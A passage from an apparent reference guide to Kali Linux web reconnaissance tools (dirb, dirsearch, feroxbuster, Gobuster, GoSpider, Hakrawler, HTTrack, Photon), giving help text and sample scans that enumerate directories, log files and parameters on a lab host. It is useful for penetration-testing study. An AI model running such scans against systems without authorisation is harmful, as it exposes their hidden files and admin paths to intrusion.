[✓] parameter detected: address, based on: body length
[✓] parameter detected: _page, based on: http headers
[+] Parameters found: email, object, q, created, discount, metadata, description, callback, balance, name, currency, id, shipping, phone, address, _page
DIRB
Performs wordlist-based web content discovery against a web server.
■ Usage
root@kali:~# dirb
dirb <url_base> [<wordlist_file(s)>] [options]
========================= NOTES =========================
<url_base> : Base URL to scan. (Use -resume for session resuming)
<wordlist_file(s)> : List of wordfiles. (wordfile1,wordfile2,wordfile3...)
======================== HOTKEYS ========================
'n' -> Go to next directory.
'q' -> Stop scan. (Saving state for resume)
'r' -> Remaining scan stats.
======================== OPTIONS ========================
-a <agent_string> : Specify your custom USER_AGENT.
-b : Use path as is.
-c <cookie_string> : Set a cookie for the HTTP request.
-E <certificate> : path to the client certificate.
-f : Fine tunning of NOT_FOUND (404) detection.
-H <header_string> : Add a custom header to the HTTP request.
-i : Use case-insensitive search.
-l : Print "Location" header when found.
-N <nf_code>: Ignore responses with this HTTP code.
-o <output_file> : Save output to disk.
-p <proxy[:port]> : Use this proxy. (Default port is 1080)
-P <proxy_username:proxy_password> : Proxy Authentication.
-r : Don't search recursively.
-R : Interactive recursion. (Asks for each directory)
-S : Silent Mode. Don't show tested words. (For dumb terminals)
-t : Don't force an ending '/' on URLs.
-u <username:password> : HTTP Authentication.
-v : Show also NOT_FOUND pages.
-w : Don't stop on WARNING messages.
-X <extensions> / -x <exts_file> : Append each word with this extensions.
-z <millisecs> : Add a milliseconds delay to not cause excessive Flood.
======================== EXAMPLES =======================
dirb http://url/directory/ (Simple Test)
dirb http://url/ -X .html (Test files with '.html' extension)
dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt (Test with apache.txt wordlist)
dirb https://secure_url/ (Simple Test with SSL)
■ Example
# Enumerate directories directly under the root
root@kali:~# dirb http://192.168.11.4/ words.txt -r
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Sep 25 11:45:45 2024
URL_BASE: http://192.168.11.4/
WORDLIST_FILES: words.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 87568
---- Scanning URL: http://192.168.11.4/ ----
==> DIRECTORY: http://192.168.11.4/admin/
==> DIRECTORY: http://192.168.11.4/system/
==> DIRECTORY: http://192.168.11.4/manual/
==> DIRECTORY: http://192.168.11.4/logs/
==> DIRECTORY: http://192.168.11.4/2023/
==> DIRECTORY: http://192.168.11.4/2024/
-----------------
END_TIME: Wed Sep 25 11:48:56 2024
# Enumerate log files directly under the logs directory
root@kali:~# dirb http://192.168.11.4/logs/ words.txt -X .log
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Sep 25 12:18:35 2024
URL_BASE: http://192.168.11.4/logs/
WORDLIST_FILES: words.txt
EXTENSIONS_LIST: (.log) | (.log) [NUM = 1]
-----------------
GENERATED WORDS: 87568
---- Scanning URL: http://192.168.11.4/logs/ ----
+ http://192.168.11.4/logs/stats.log (CODE:200|SIZE:29653)
+ http://192.168.11.4/logs/apps.log (CODE:200|SIZE:198823)
+ http://192.168.11.4/logs/messages.log (CODE:200|SIZE:58863)
-----------------
END_TIME: Wed Sep 25 12:21:37 2024
dirsearch
Performs wordlist-based web content discovery against a web server.
■ Usage
root@kali:~# dirsearch --help
Usage: dirsearch.py [-u|--url] target [-e|--extensions] extensions [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
Mandatory:
-u URL, --url=URL Target URL(s), can use multiple flags
-l PATH, --url-file=PATH
URL list file
--stdin Read URL(s) from STDIN
--cidr=CIDR Target CIDR
--raw=PATH Load raw HTTP request from file (use `--scheme` flag
to set the scheme)
-s SESSION_FILE, --session=SESSION_FILE
Session file
--config=PATH Full path to config file, see 'config.ini' for example
(Default: config.ini)
Dictionary Settings:
-w WORDLISTS, --wordlists=WORDLISTS
Customize wordlists (separated by commas)
-e EXTENSIONS, --extensions=EXTENSIONS
Extension list separated by commas (e.g. php,asp)
-f, --force-extensions
Add extensions to the end of every wordlist entry. By
default dirsearch only replaces the %EXT% keyword with
extensions
-O, --overwrite-extensions
Overwrite other extensions in the wordlist with your
extensions (selected via `-e`)
--exclude-extensions=EXTENSIONS
Exclude extension list separated by commas (e.g.
asp,jsp)
--remove-extensions
Remove extensions in all paths (e.g. admin.php ->
admin)
--prefixes=PREFIXES
Add custom prefixes to all wordlist entries (separated
by commas)
--suffixes=SUFFIXES
Add custom suffixes to all wordlist entries, ignore
directories (separated by commas)
-U, --uppercase Uppercase wordlist
-L, --lowercase Lowercase wordlist
-C, --capital Capital wordlist
General Settings:
-t THREADS, --threads=THREADS
Number of threads
-r, --recursive Brute-force recursively
--deep-recursive Perform recursive scan on every directory depth (e.g.
api/users -> api/)
--force-recursive Do recursive brute-force for every found path, not
only directories
-R DEPTH, --max-recursion-depth=DEPTH
Maximum recursion depth
--recursion-status=CODES
Valid status codes to perform recursive scan, support
ranges (separated by commas)
--subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by
commas)
--exclude-subdirs=SUBDIRS
Exclude the following subdirectories during recursive
scan (separated by commas)
-i CODES, --include-status=CODES
Include status codes, separated by commas, support
ranges (e.g. 200,300-399)
-x CODES, --exclude-status=CODES
Exclude status codes, separated by commas, support
ranges (e.g. 301,500-599)
--exclude-sizes=SIZES
Exclude responses by sizes, separated by commas (e.g.
0B,4KB)
--exclude-text=TEXTS
Exclude responses by text, can use multiple flags
--exclude-regex=REGEX
Exclude responses by regular expression
--exclude-redirect=STRING
Exclude responses if this regex (or text) matches
redirect URL (e.g. '/index.html')
--exclude-response=PATH
Exclude responses similar to response of this page,
path as input (e.g. 404.html)
--skip-on-status=CODES
Skip target whenever hit one of these status codes,
separated by commas, support ranges
--min-response-size=LENGTH
Minimum response length
--max-response-size=LENGTH
Maximum response length
--max-time=SECONDS Maximum runtime for the scan
--exit-on-error Exit whenever an error occurs
Request Settings:
-m METHOD, --http-method=METHOD
HTTP method (default: GET)
-d DATA, --data=DATA
HTTP request data
--data-file=PATH File contains HTTP request data
-H HEADERS, --header=HEADERS
HTTP request header, can use multiple flags
--header-file=PATH File contains HTTP request headers
-F, --follow-redirects
Follow HTTP redirects
--random-agent Choose a random User-Agent for each request
--auth=CREDENTIAL Authentication credential (e.g. user:password or
bearer token)
--auth-type=TYPE Authentication type (basic, digest, bearer, ntlm, jwt,
oauth2)
--cert-file=PATH File contains client-side certificate
--key-file=PATH File contains client-side certificate private key
(unencrypted)
--user-agent=USER_AGENT
--cookie=COOKIE
Connection Settings:
--timeout=TIMEOUT Connection timeout
--delay=DELAY Delay between requests
--proxy=PROXY Proxy URL (HTTP/SOCKS), can use multiple flags
--proxy-file=PATH File contains proxy servers
--proxy-auth=CREDENTIAL
Proxy authentication credential
--replay-proxy=PROXY
Proxy to replay with found paths
--tor Use Tor network as proxy
--scheme=SCHEME Scheme for raw request or if there is no scheme in the
URL (Default: auto-detect)
--max-rate=RATE Max requests per second
--retries=RETRIES Number of retries for failed requests
--ip=IP Server IP address
Advanced Settings:
--crawl Crawl for new paths in responses
View Settings:
--full-url Full URLs in the output (enabled automatically in
quiet mode)
--redirects-history
Show redirects history
--no-color No colored output
-q, --quiet-mode Quiet mode
Output Settings:
-o PATH, --output=PATH
Output file
--format=FORMAT Report format (Available: simple, plain, json, xml,
md, csv, html, sqlite)
--log=PATH Log file
■ Example
# Enumerate directories directly under the root
root@kali:~# dirsearch -u http://192.168.11.4/ -w words.txt
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 87649
Output File: /reports/http_192.168.11.4/__24-09-26_00-08-19.txt
Target: http://192.168.11.4/
[00:08:19] Starting:
[00:08:19] 301 - 230B - /admin -> http://192.168.11.4/admin/
[00:08:21] 301 - 231B - /system -> http://192.168.11.4/system/
[00:08:21] 301 - 231B - /manual -> http://192.168.11.4/manual/
[00:08:25] 301 - 229B - /logs -> http://192.168.11.4/logs/
[00:09:16] 301 - 229B - /2023 -> http://192.168.11.4/2023/
[00:09:16] 301 - 229B - /2024 -> http://192.168.11.4/2024/
Task Completed
# Enumerate log files directly under the logs directory
# Running with "-e log -f" would also enumerate directories, so "--suffixes .log" is used instead
root@kali:~# dirsearch -u http://192.168.11.4/logs/ --suffixes .log -w words.txt
Extensions: php, aspx, jsp, html, js | Suffixes: .log | HTTP method: GET | Threads: 25 | Wordlist size: 87649
Output File: /reports/http_192.168.11.4/_logs__24-09-26_01-33-39.txt
Target: http://192.168.11.4/
[01:33:39] Starting: logs/
[01:33:39] 200 - 6B - /logs/stats.log
[01:33:39] 200 - 6B - /logs/apps.log
[01:33:41] 200 - 6B - /logs/messages.log
Task Completed
feroxbuster
Combines brute force with wordlists to find unlinked content inside target directories.
■ Usage
root@kali:~# feroxbuster --help
Usage: feroxbuster [OPTIONS]
Options:
-h, --help
Print help (see a summary with '-h')
-V, --version
Print version
Target selection:
-u, --url <URL>
The target URL (required, unless [--stdin || --resume-from || --request-file] used)
--stdin
Read url(s) from STDIN
--resume-from <STATE_FILE>
State file from which to resume a partially complete scan (ex. --resume-from ferox-1606586780.state)
--request-file <REQUEST_FILE>
Raw HTTP request file to use as a template for all requests
Composite settings:
--burp
Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay
Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart
Set --auto-tune, --collect-words, and --collect-backups to true
--thorough
Use the same settings as --smart and set --collect-extensions and --scan-dir-listings to true
Proxy settings:
-p, --proxy <PROXY>
Proxy to use for requests (ex: http(s)://host:port, socks5(h)://host:port)
-P, --replay-proxy <REPLAY_PROXY>
Send only unfiltered requests through a Replay Proxy, instead of all requests
-R, --replay-codes <REPLAY_CODE>...
Status Codes to send through a Replay Proxy when found (default: --status-codes value)
Request settings:
-a, --user-agent <USER_AGENT>
Sets the User-Agent (default: feroxbuster/2.11.0)
-A, --random-agent
Use a random User-Agent
-x, --extensions <FILE_EXTENSION>...
File extension(s) to search for (ex: -x php -x pdf js); reads values (newline-separated) from file if input starts with an @ (ex: @ext.txt)
-m, --methods <HTTP_METHODS>...
Which HTTP request method(s) should be sent (default: GET)
--data <DATA>
Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-H, --headers <HEADER>...
Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-b, --cookies <COOKIE>...
Specify HTTP cookies to be used in each request (ex: -b stuff=things)
-Q, --query <QUERY>...
Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-f, --add-slash
Append / to each request's URL
--protocol <PROTOCOL>
Specify the protocol to use when targeting via --request-file or --url with domain only (default: https)
Request filters:
--dont-scan <URL>...
URL(s) or Regex Pattern(s) to exclude from recursion/scans
Response filters:
-S, --filter-size <SIZE>...
Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-X, --filter-regex <REGEX>...
Filter out messages via regular expression matching on the response's body/headers (ex: -X '^ignore me$')
-W, --filter-words <WORDS>...
Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-N, --filter-lines <LINES>...
Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-C, --filter-status <STATUS_CODE>...
Filter out status codes (deny list) (ex: -C 200 -C 401)
--filter-similar-to <UNWANTED_PAGE>...
Filter out pages that are similar to the given page (ex. --filter-similar-to http://site.xyz/soft404)
-s, --status-codes <STATUS_CODE>...
Status Codes to include (allow list) (default: All Status Codes)
Client settings:
-T, --timeout <SECONDS>
Number of seconds before a client's request times out (default: 7)
-r, --redirects
Allow client to follow redirects
-k, --insecure
Disables TLS certificate validation in the client
--server-certs <PEM|DER>...
Add custom root certificate(s) for servers with unknown certificates
--client-cert <PEM>
Add a PEM encoded certificate for mutual authentication (mTLS)
--client-key <PEM>
Add a PEM encoded private key for mutual authentication (mTLS)
Scan settings:
-t, --threads <THREADS>
Number of concurrent threads (default: 50)
-n, --no-recursion
Do not scan recursively
-d, --depth <RECURSION_DEPTH>
Maximum recursion depth, a depth of 0 is infinite recursion (default: 4)
--force-recursion
Force recursion attempts on all 'found' endpoints (still respects recursion depth)
--dont-extract-links
Don't extract links from response body (html, javascript, etc...)
-L, --scan-limit <SCAN_LIMIT>
Limit total number of concurrent scans (default: 0, i.e. no limit)
--parallel <PARALLEL_SCANS>
Run parallel feroxbuster instances (one child process per url passed via stdin)
--rate-limit <RATE_LIMIT>
Limit number of requests per second (per directory) (default: 0, i.e. no limit)
--time-limit <TIME_SPEC>
Limit total run time of all scans (ex: --time-limit 10m)
-w, --wordlist <FILE>
Path or URL of the wordlist
--auto-tune
Automatically lower scan rate when an excessive amount of errors are encountered
--auto-bail
Automatically stop scanning when an excessive amount of errors are encountered
-D, --dont-filter
Don't auto-filter wildcard responses
--scan-dir-listings
Force scans to recurse into directory listings
Dynamic collection settings:
-E, --collect-extensions
Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-B, --collect-backups [<collect_backups>...]
Automatically request likely backup extensions for "found" urls (default: ~, .bak, .bak2, .old, .1)
-g, --collect-words
Automatically discover important words from within responses and add them to the wordlist
-I, --dont-collect <FILE_EXTENSION>...
File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)
Output settings:
-v, --verbosity...
Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)
--silent
Only print URLs (or JSON w/ --json) + turn off logging (good for piping a list of urls to other commands)
-q, --quiet
Hide progress bars and banner (good for tmux windows w/ notifications)
--json
Emit JSON logs to --output and --debug-log instead of normal text
-o, --output <FILE>
Output file to write results to (use w/ --json for JSON entries)
--debug-log <FILE>
Output file to write log entries (use w/ --json for JSON entries)
--no-state
Disable state output file (*.state)
--limit-bars <NUM_BARS_TO_SHOW>
Number of directory scan bars to show at any given time (default: no limit)
Update settings:
-U, --update
Update feroxbuster to the latest version
NOTE:
Options that take multiple values are very flexible. Consider the following ways of specifying
extensions:
feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
The command above adds .pdf, .js, .html, .php, .txt, .json, and .docx to each url
All of the methods above (multiple flags, space separated, comma separated, etc...) are valid
and interchangeable. The same goes for urls, headers, status codes, queries, and size filters.
■ Example
root@kali:~# feroxbuster --url http://192.168.11.4 --depth 2 --wordlist words.txt -x php -x html
[...]
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.11.4
🚀 Threads │ 50
📖 Wordlist │ words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, html]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 269l 2570w 53733c http://192.168.11.4/
301 GET 0l 0w 0c http://192.168.11.4/index.php => http://192.168.11.4/
200 GET 384l 3177w 19915c http://192.168.11.4/license.txt
200 GET 13l 78w 4373c http://192.168.11.4/wp-admin/images/wordpress-logo.png
200 GET 379l 743w 5967c http://192.168.11.4/wp-admin/css/install.css
302 GET 0l 0w 0c http://192.168.11.4/wp-admin/update-core.php => http://192.168.11.4/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.4%2Fwp-admin%2Fupdate-core.php&reauth=1
302 GET 0l 0w 0c http://192.168.11.4/wp-admin/import.php => http://192.168.11.4/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.4%2Fwp-admin%2Fimport.php&reauth=1
200 GET 23l 68w 1191c http://192.168.11.4/wp-admin/upgrade.php
302 GET 0l 0w 0c http://192.168.11.4/wp-admin/ => http://192.168.11.4/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.4%2Fwp-admin%2F&reauth=1
200 GET 116l 408w 7852c http://192.168.11.4/wp-login.php
200 GET 17l 63w 1284c http://192.168.11.4/wp-admin/install.php
200 GET 97l 830w 7437c http://86wordpress/readme.html
[...]
[####################] - 5s 42738/42738 0s found:74 errors:0
[####################] - 2s 14205/14205 7307/s http://192.168.11.4/
[####################] - 3s 14205/14205 4704/s http://192.168.11.4/wp-content/
[####################] - 3s 14205/14205 4704/s http://192.168.11.4/wp-includes/
Gobuster
Uses wordlists to enumerate URLs, subdomains, virtual hosts, S3 bucket names and more.
■ Usage
root@kali:~# gobuster help
Usage:
gobuster [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
gcs Uses gcs bucket enumeration mode
help Help about any command
s3 Uses aws bucket enumeration mode
tftp Uses TFTP enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)
Flags:
--debug Enable debug output
--delay duration Time each thread waits between requests (e.g. 1500ms)
-h, --help help for gobuster
--no-color Disable color output
--no-error Don't display errors
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist. Set to - to use STDIN.
--wordlist-offset int Resume from a given position in the wordlist (defaults to 0)
■ Example
root@kali:~# gobuster dir --url http://192.168.11.4/includes/ -x inc --wordlist words.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.4/includes/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: inc
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/common.inc (Status: 200) [Size: 290727]
/image.inc (Status: 200) [Size: 12137]
/mail.inc (Status: 200) [Size: 21628]
/password.inc (Status: 200) [Size: 9362]
/ajax.inc (Status: 200) [Size: 45330]
/menu.inc (Status: 200) [Size: 132504]
/install.inc (Status: 200) [Size: 40782]
/form.inc (Status: 200) [Size: 182668]
/file.inc (Status: 200) [Size: 84154]
/date.inc (Status: 200) [Size: 4505]
/update.inc (Status: 200) [Size: 58047]
/language.inc (Status: 200) [Size: 13605]
/cache.inc (Status: 200) [Size: 17508]
/theme.inc (Status: 200) [Size: 97675]
/module.inc (Status: 200) [Size: 36163]
[...]
===============================================================
Finished
===============================================================
root@kali:~# gobuster fuzz --url http://192.168.11.4/?q=FUZZ --wordlist words.txt --excludestatuscodes 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.4/?q=FUZZ
[+] Method: GET
[+] Threads: 10
[+] Wordlist: words.txt
[+] Excluded Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in fuzzing mode
===============================================================
Found: [Status=403] [Length=7713] [Word=search] http://192.168.11.4/?q=search
Found: [Status=200] [Length=7648] [Word=user] http://192.168.11.4/?q=user
Found: [Status=200] [Length=9860] [Word=0] http://192.168.11.4/?q=0
Found: [Status=403] [Length=7877] [Word=admin] http://192.168.11.4/?q=admin
Found: [Status=200] [Length=9860] [Word=node] http://192.168.11.4/?q=node
Found: [Status=403] [Length=7713] [Word=Search] http://192.168.11.4/?q=Search
Found: [Status=200] [Length=9293] [Word=User] http://192.168.11.4/?q=User
Found: [Status=403] [Length=7710] [Word=Admin] http://192.168.11.4/?q=Admin
[...]
GoSpider
Crawls the given site and collects URLs.
■ Usage
root@kali:~# gospider --help
Usage:
gospider [flags]
Flags:
-s, --site string Site to crawl
-S, --sites string Site list to crawl
-p, --proxy string Proxy (Ex: http://127.0.0.1:8080)
-o, --output string Output folder
-u, --user-agent string User Agent to use
web: random web user-agent
mobi: random mobile user-agent
or you can set your special user-agent (default "web")
--cookie string Cookie to use (testA=a; testB=b)
-H, --header stringArray Header to use (Use multiple flag to set multiple header)
--burp string Load headers and cookie from burp raw http request
--blacklist string Blacklist URL Regex
-t, --threads int Number of threads (Run sites in parallel) (default 1)
-c, --concurrent int The number of the maximum allowed concurrent requests of the matching domains (default 5)
-d, --depth int MaxDepth limits the recursion depth of visited URLs. (Set it to 0 for infinite recursion) (default 1)
-k, --delay int Delay is the duration to wait before creating a new request to the matching domains (second)
-K, --random-delay int RandomDelay is the extra randomized duration to wait added to Delay before creating a new request (second)
-m, --timeout int Request timeout (second) (default 10)
--sitemap Try to crawl sitemap.xml
--robots Try to crawl robots.txt (default true)
-a, --other-source Find URLs from 3rd party (Archive.org, CommonCrawl.org, VirusTotal.com)
-w, --include-subs Include subdomains crawled from 3rd party. Default is main domain
-r, --include-other-source Also include other-source's urls (still crawl and request)
--debug Turn on debug mode
-v, --verbose Turn on verbose
--no-redirect Disable redirect
--version Check version
-h, --help help for gospider
■ Example
root@kali:~# gospider -v -d 5 -s http://192.168.11.4/
INFO Crawling site: http://192.168.11.4/
[subdomains] - 192.168.11.4
[url] - [code-200] - http://192.168.11.4/
[javascript] - http://192.168.11.4/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba
[url] - [code-200] - http://192.168.11.4/wp-includes/wlwmanifest.xml
[url] - [code-200] - http://192.168.11.4/?feed=comments-rss2
[url] - [code-200] - http://192.168.11.4/xmlrpc.php?rsd
[url] - [code-200] - http://192.168.11.4/?feed=rss2
[url] - [code-200] - http://192.168.11.4/?page_id=2
[url] - [code-200] - http://192.168.11.4/?page_id=733
[url] - [code-200] - http://192.168.11.4/?page_id=1977
[url] - [code-200] - http://192.168.11.4/?page_id=701
[url] - [code-200] - http://192.168.11.4/?page_id=703
[...]
Hakrawler
Crawls the given URL and collects URLs.
■ Usage
root@kali:~# hakrawler --help
Usage of hakrawler:
-d int
Depth to crawl. (default 2)
-h string
Custom headers separated by two semi-colons. E.g. -h "Cookie: foo=bar;;Referer: http://example.com/"
-insecure
Disable TLS verification.
-json
Output as JSON.
-proxy string
Proxy URL. E.g. -proxy http://127.0.0.1:8080
-s Show the source of URL based on where it was found. E.g. href, form, script, etc.
-size int
Page size limit, in KB. (default -1)
-subs
Include subdomains for crawling.
-t int
Number of threads to utilise. (default 8)
-timeout int
Maximum time to crawl each URL from stdin, in seconds. (default -1)
-u Show only unique urls.
■ Example
root@kali:~# echo http://192.168.11.4 | hakrawler
http://192.168.11.4/
http://192.168.11.4/?page_id=2
http://192.168.11.4/?page_id=703
http://192.168.11.4/?page_id=701
http://192.168.11.4/?page_id=182
http://192.168.11.4/?page_id=1134
http://192.168.11.4/?page_id=1133
http://192.168.11.4/?page_id=501
http://192.168.11.4/?page_id=155
http://192.168.11.4/?page_id=156
http://192.168.11.4/?page_id=174
[...]
HTTrack
Copies (mirrors) the given site to local disk.
■ Usage
root@kali:~# httrack --help
usage: httrack <URLs> [-option] [+<URL_FILTER>] [-<URL_FILTER>] [+<mime:MIME_FILTER>] [-<mime:MIME_FILTER>]
with options listed below: (* is the default value)
General options:
O path for mirror/logfiles+cache (-O path_mirror[,path_cache_and_logfiles]) (--path <param>)
Action options:
w *mirror web sites (--mirror)
W mirror web sites, semi-automatic (asks questions) (--mirror-wizard)
g just get files (saved in the current directory) (--get-files)
i continue an interrupted mirror using the cache (--continue)
Y mirror ALL links located in the first level pages (mirror links) (--mirrorlinks)
Proxy options:
P proxy use (-P proxy:port or -P user:pass@proxy:port) (--proxy <param>)
%f *use proxy for ftp (f0 don't use) (--httpproxy-ftp[=N])
%b use this local hostname to make/send requests (-%b hostname) (--bind <param>)
Limits options:
rN set the mirror depth to N (* r9999) (--depth[=N])
%eN set the external links depth to N (* %e0) (--ext-depth[=N])
mN maximum file length for a non-html file (--max-files[=N])
mN,N2 maximum file length for non html (N) and html (N2)
MN maximum overall size that can be uploaded/scanned (--max-size[=N])
EN maximum mirror time in seconds (60=1 minute, 3600=1 hour) (--max-time[=N])
AN maximum transfer rate in bytes/seconds (1000=1KB/s max) (--max-rate[=N])
%cN maximum number of connections/seconds (*%c10) (--connection-per-second[=N])
GN pause transfer if N bytes reached, and wait until lock file is deleted (--max-pause[=N])
Flow control:
cN number of multiple connections (*c8) (--sockets[=N])
TN timeout, number of seconds after a non-responding link is shutdown (--timeout[=N])
RN number of retries, in case of timeout or non-fatal errors (*R1) (--retries[=N])
JN traffic jam control, minimum transfert rate (bytes/seconds) tolerated for a link (--min-rate[=N])
HN host is abandoned if: 0=never, 1=timeout, 2=slow, 3=timeout or slow (--host-control[=N])
Links options:
%P *extended parsing, attempt to parse all links, even in unknown tags or Javascript (%P0 don't use) (--extended-parsing[=N])
n get non-html files 'near' an html file (ex: an image located outside) (--near)
t test all URLs (even forbidden ones) (--test)
%L <file> add all URL located in this text file (one URL per line) (--list <param>)
%S <file> add all scan rules located in this text file (one scan rule per line) (--urllist <param>)
Build options:
NN structure type (0 *original structure, 1+: see below) (--structure[=N])
or user defined structure (-N "%h%p/%n%q.%t")
%N delayed type check, don't make any link test but wait for files download to start instead (experimental) (%N0 don't use, %N1 use for unknown extensions, * %N2 always use)
%D cached delayed type check, don't wait for remote type during updates, to speedup them (%D0 wait, * %D1 don't wait) (--cached-delayed-type-check)
%M generate a RFC MIME-encapsulated full-archive (.mht) (--mime-html)
LN long names (L1 *long names / L0 8-3 conversion / L2 ISO9660 compatible) (--long-names[=N])
KN keep original links (e.g. http://www.adr/link) (K0 *relative link, K absolute links, K4 original links, K3 absolute URI links, K5 transparent proxy link) (--keep-links[=N])
x replace external html links by error pages (--replace-external)
%x do not include any password for external password protected websites (%x0 include) (--disable-passwords)
%q *include query string for local files (useless, for information purpose only) (%q0 don't include) (--include-query-string)
o *generate output html file in case of error (404..) (o0 don\'t generate) (--generate-errors)
X *purge old files after update (X0 keep delete) (--purge-old[=N])
%p preserve html files 'as is' (identical to '-K4 -%F ""') (--preserve)
%T links conversion to UTF-8 (--utf8-conversion)
Spider options:
bN accept cookies in cookies.txt (0=do not accept,* 1=accept) (--cookies[=N])
u check document type if unknown (cgi,asp..) (u0 don't check, * u1 check but /, u2 check always) (--check-type[=N])
j *parse Java Classes (j0 don't parse, bitmask: |1 parse default, |2 don't parse .class |4 don't parse .js |8 don't be aggressive) (--parse-java[=N])
sN follow robots.txt and meta robots tags (0=never,1=sometimes,* 2=always, 3=always (even strict rules)) (--robots[=N])
%h force HTTP/1.0 requests (reduce update features, only for old servers or proxies) (--http-10)
%k use keep-alive if possible, greately reducing latency for small files and test requests (%k0 don't use) (--keep-alive)
%B tolerant requests (accept bogus responses on some servers, but not standard!) (--tolerant)
%s update hacks: various hacks to limit re-transfers when updating (identical size, bogus response..) (--updatehack)
%u url hacks: various hacks to limit duplicate URLs (strip //, www.foo.com==foo.com..) (--urlhack)
%A assume that a type (cgi,asp..) is always linked with a mime type (-%A php3,cgi=text/html;dat,bin=application/x-zip) (--assume <param>)
shortcut: '--assume standard' is equivalent to -%A php2 php3 php4 php cgi asp jsp pl cfm nsf=text/html
can also be used to force a specific file type: --assume foo.cgi=text/html
@iN internet protocol (0=both ipv6+ipv4, 4=ipv4 only, 6=ipv6 only) (--protocol[=N])
%w disable a specific external mime module (-%w htsswf -%w htsjava) (--disable-module <param>)
Browser ID:
F user-agent field sent in HTTP headers (-F "user-agent name") (--user-agent <param>)
%R default referer field sent in HTTP headers (--referer <param>)
%E from email address sent in HTTP headers (--from <param>)
%F footer string in Html code (-%F "Mirrored [from host %s [file %s [at %s]]]" (--footer <param>)
%l preffered language (-%l "fr, en, jp, *" (--language <param>)
%a accepted formats (-%a "text/html,image/png;q=0.9,*/*;q=0.1" (--accept <param>)
%X additional HTTP header line (-%X "X-Magic: 42" (--headers <param>)
Log, index, cache
C create/use a cache for updates and retries (C0 no cache,C1 cache is prioritary,* C2 test update before) (--cache[=N])
k store all files in cache (not useful if files on disk) (--store-all-in-cache)
%n do not re-download locally erased files (--do-not-recatch)
%v display on screen filenames downloaded (in realtime) - * %v1 short version - %v2 full animation (--display)
Q no log - quiet mode (--do-not-log)
q no questions - quiet mode (--quiet)
z log - extra infos (--extra-log)
Z log - debug (--debug-log)
v log on screen (--verbose)
f *log in files (--file-log)
f2 one single log file (--single-log)
I *make an index (I0 don't make) (--index)
%i make a top index for a project folder (* %i0 don\'t make) (--build-top-index)
%I make an searchable index for this mirror (* %I0 don\'t make) (--search-index)
■ Example
root@kali:~# httrack https://192.168.11.4
Mirror launched on Tue, 15 Oct 2024 13:18:53 by HTTrack Website Copier/3.49-5 [XR&CO'2014]
mirroring https://192.168.11.4 with the wizard help..
[...]
Thanks for using HTTrack!
Photon
Crawls a website and collects page URLs, e-mail addresses, static-file URLs and similar data.
■ Usage
root@kali:~# photon --help
usage: photon.py [-h] [-u ROOT] [-c COOK] [-r REGEX] [-e {csv,json}] [-o OUTPUT] [-l LEVEL] [-t THREADS] [-d DELAY] [-v]
[-s SEEDS [SEEDS ...]] [--stdout STD] [--user-agent USER_AGENT] [--exclude EXCLUDE] [--timeout TIMEOUT] [--clone] [--headers]
[--dns] [--keys] [--only-urls] [--wayback]
options:
-h, --help show this help message and exit
-u ROOT, --url ROOT root url
-c COOK, --cookie COOK
cookie
-r REGEX, --regex REGEX
regex pattern
-e {csv,json}, --export {csv,json}
export format
-o OUTPUT, --output OUTPUT
output directory
-l LEVEL, --level LEVEL
levels to crawl
-t THREADS, --threads THREADS
number of threads
-d DELAY, --delay DELAY
delay between requests
-v, --verbose verbose output
-s SEEDS [SEEDS ...], --seeds SEEDS [SEEDS ...]
additional seed URLs
--stdout STD send variables to stdout
--user-agent USER_AGENT
custom user agent(s)
--exclude EXCLUDE exclude URLs matching this regex
